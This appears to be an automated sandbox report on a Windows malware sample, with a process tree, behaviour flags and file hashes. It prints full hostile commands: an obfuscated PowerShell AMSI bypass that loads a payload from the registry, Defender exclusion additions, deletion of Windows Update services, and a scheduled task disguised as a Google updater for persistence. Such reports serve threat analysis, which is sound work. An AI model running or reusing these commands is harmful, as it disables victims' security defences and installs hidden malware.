C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IZvLNQxByUyB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rTqGxIQPGJiKza,[Parameter(Position=1)][Type]$oPLoUAlLzn)$KLkqgjJOoHS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'Del'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'yM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+'ga'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c,'+'S'+''+'e'+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'A'+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$KLkqgjJOoHS.DefineConstructor('R'+[Char](84)+'Sp'+[Char](101)+'c'+'i'+''+[Char](97)+'lNa'+'m'+''+[Char](101)+','+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'bl'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$rTqGxIQPGJiKza).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+'na'+'g'+''+'e'+''+[Char](100)+'');$KLkqgjJOoHS.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+'wS'+[Char](108)+''+'o'+''+[Char](116)+','+'V'+'i'+[Char](114)+'t'+[Char](117)+'a'+'l'+'',$oPLoUAlLzn,$rTqGxIQPGJiKza).SetImplementationFlags('R'+'u'+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $KLkqgjJOoHS.CreateType();}$ODamPajeTXNoZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+'e'+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+'t.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+'2'+'.'+[Char](85)+'ns'+[Char](97)+''+[Char](102)+'e'+[Char](79)+''+[Char](68)+''+[Char](97)+'m'+[Char](80)+''+'a'+'j'+[Char](101)+'TX'+'N'+''+'o'+''+'Z'+'');$eYzAXlwrZvCzLh=$ODamPajeTXNoZ.GetMethod(''+[Char](101)+''+[Char](89)+'zAX'+[Char](108)+''+[Char](119)+''+'r'+''+[Char](90)+''+[Char](118)+''+[Char](67)+''+'z'+''+[Char](76)+''+[Char](104)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic,'+[Char](83)+'ta'+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mhzluDsQCHqiknrQiXi=IZvLNQxByUyB @([String])([IntPtr]);$udDXqZGQPGcUpfxUGpWcTl=IZvLNQxByUyB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KqkHQKtoaef=$ODamPajeTXNoZ.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+[Char](108)+'3'+[Char](50)+'.'+'d'+'ll')));$ZsxAtKDLMLJCmX=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$KqkHQKtoaef,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$JmXFapyPAftBXmvZG=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$KqkHQKtoaef,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+'r'+'o'+'t'+''+[Char](101)+''+'c'+'t')));$VpvLgyC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZsxAtKDLMLJCmX,$mhzluDsQCHqiknrQiXi).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+'l'+[Char](108)+'');$DJPwMyEbeadCTvbgs=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$VpvLgyC,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$KnRgBJfvOH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JmXFapyPAftBXmvZG,$udDXqZGQPGcUpfxUGpWcTl).Invoke($DJPwMyEbeadCTvbgs,[uint32]8,4,[ref]$KnRgBJfvOH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DJPwMyEbeadCTvbgs,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JmXFapyPAftBXmvZG,$udDXqZGQPGcUpfxUGpWcTl).Invoke($DJPwMyEbeadCTvbgs,[uint32]8,0x20,[ref]$KnRgBJfvOH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+'W'+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+'rst'+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1800
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:728
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
PID:1100
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:920
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1152
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1168
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:764
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1312
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1412
-
c:\windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2824
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1428
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1444
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1488
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
- Modifies Internet Explorer settings
PID:1624
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1608
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1752
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1744
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1880
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2016
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1968
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2236
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2324
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2264
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2416
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2480
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4628
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3652
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4656
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2948
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3756
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3200
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:5000
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:4352
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4200
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:5032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:4608
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2600 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.0.1328874663\652812049" -parentBuildID 20221007134813 -prefsHandle 1640 -prefMapHandle 1628 -prefsLen 20888 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f3f2cd-0156-46eb-be80-2dac44842e46} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 1732 25a1fc1a558 gpu4⤵PID:4744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.1.642940632\1519065521" -parentBuildID 20221007134813 -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 20969 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dee773ce-4d48-4a32-b3c9-4f37dfe9b0b9} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 2088 25a1e7fa558 socket4⤵
- Checks processor information in registry
PID:164
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.2.1440049793\688447532" -childID 1 -isForBrowser -prefsHandle 2696 -prefMapHandle 2712 -prefsLen 21052 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {16aa0724-52f1-4eeb-89e9-56b0b7f1899f} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 2892 25a226ed258 tab4⤵PID:4568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.4.1988170570\1960732705" -childID 3 -isForBrowser -prefsHandle 3656 -prefMapHandle 3448 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5043c43-ebd3-4ede-846d-f96685dbf03c} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 3664 25a2380a158 tab4⤵PID:1796
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.3.1086498294\846068342" -childID 2 -isForBrowser -prefsHandle 3456 -prefMapHandle 3452 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5498bf3b-7ec2-49e3-9aaa-7ea64de0fc41} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 3464 25a229deb58 tab4⤵PID:4864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.5.1156688670\1610931462" -childID 4 -isForBrowser -prefsHandle 4768 -prefMapHandle 4744 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1233b40-70e4-4cb4-8784-82510402ccdb} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4788 25a24838658 tab4⤵PID:3940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.7.1629581759\1693239971" -childID 6 -isForBrowser -prefsHandle 5084 -prefMapHandle 5088 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb561192-fca7-4587-a109-1756deb4196b} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4984 25a24ebb558 tab4⤵PID:2560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.6.598857025\236853237" -childID 5 -isForBrowser -prefsHandle 4892 -prefMapHandle 4896 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eef8acad-4d3d-46cb-a2ec-22f587303a41} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4808 25a24eb8258 tab4⤵PID:4000
-
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3660
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2028
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2840
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2488
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2468
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2460
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4604
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4604 -s 7882⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1208
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4040
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4040 -s 8562⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1136
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4040 -s 8362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4756
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:3336
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5032
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵PID:3912
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3912 -s 4122⤵
- Program crash
PID:4716
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3912 -s 4602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1456
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4652
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4652 -s 4042⤵
- Program crash
PID:4876
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc1⤵PID:4624
-
C:\Windows\System32\SystemSettingsBroker.exeC:\Windows\System32\SystemSettingsBroker.exe -Embedding1⤵PID:4444
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s SstpSvc1⤵PID:3516
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s RmSvc1⤵PID:3916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3640
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
- Drops file in Windows directory
PID:5048
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s RasMan1⤵PID:4100
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2120
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2120 -s 3362⤵
- Program crash
PID:3108
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1824
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1824 -s 3602⤵
- Program crash
PID:4520
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1824 -s 6442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:320
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in Windows directory
PID:4872 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4872 -s 6962⤵
- Program crash
PID:4012
-
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3032
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2096
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1988
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in Windows directory
PID:4192 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4192 -s 6922⤵
- Program crash
PID:4160
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4192 -s 6682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3748
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5ed311df6c43285f8f165b89293bd96dc
SHA139cd87d13d6bff2155083d834fb1670ba1e9dfcc
SHA256467de0cf1a99077db86e3d57a95a8c852668fe08eefba52d40ae49da7014e89e
SHA512607d7b2cfb157e2b95b5ca809e61def87bb08625730086de10537a7a17d7299b4066bc323111d2c8be485e0c095f5c4e75ddda4957dec55906e3bfca1c9602f7
-
Filesize
12KB
MD5e8738e0ccc1966d4a660e8a79d5d497b
SHA15d21bc87ad93b20143ae5ac767ac880b668ee89f
SHA256b471e835accab52c53ff1309e6f73bfb1764351614873da676aea1eceb271c8a
SHA512bd7e9b271316807af999cc57618bd53af81917a102f283968aed02d5c4714913401d9503fcbfeac15aea9a575d71332d6b5e3e4e30e8247c3c9237394c4f2370
-
Filesize
29KB
MD5b881a06d6ab03a733a28d1f378635f75
SHA16ad4561c94c1dc055ec2d31d3a2f8325fec92dbc
SHA256d24f99b10e11c8fe3da387c1e4ef9b5954d8e69b01d2fddf2514cdbdb4953250
SHA51272d0b39d27183a0cb512e6f8b763d16d36106608c27e059337afecd00f4ee6c940ec4e2771120b1cadc0b9bd741aef01e7ef4374d77bf3715e21b9490bef17b4
-
Filesize
12KB
MD5171889fb841d7debf5da43392ccd3ef3
SHA14890fcf85d7de7fa3b1e4cb214875e0370f5d135
SHA256332a1f4b14cc9123bb38bcca61d835a9e18738036b105afc853c271c1e13c1ed
SHA512df6dbfd477b8ad186a252a2e1248e36181406e2c24fc7ff0fbde462730a52b177673d5abc4956651594febac275cbb8d4b1b479119cd492c00bb2d3b284db62b
-
Filesize
31KB
MD5ed0eb3a3ab6ad17666b455624f293dca
SHA1ab58aef949db99513dc8b119cecdbc12d9fbbec3
SHA256387026b6423ab78b8bc94139dbfe525b21d49dec77bc458b8ce6b042f0970075
SHA512e03d7e67574fa4b17a68366dede6b7d567e0a381716f3306644e9088bd23db45ea33a43cded8645b5b36dcfdbdd8a006ac020358be3f932cb8d3910f8f90dce7
-
Filesize
12KB
MD5535f7c646ab273e67e0be6b554aa6b4c
SHA10901bfb62f3ea32c38bd3eae0fafb9bd39cdf271
SHA25675bb2f949e5c407261f4e191de2da93c08b840ecf6a605a29f54b8dca8079571
SHA51269f3c22f3a1a224de959b0378f20b35f33a0cfd1b910a74e0e5a9e1bbada213a4cd6ecafd4d3b4aa3aa7ed2c6bf67e5cb893e3bf4fb2ff17475f22074508a45c
-
Filesize
30KB
MD5d765ec59c68cee921169a67c83d1533b
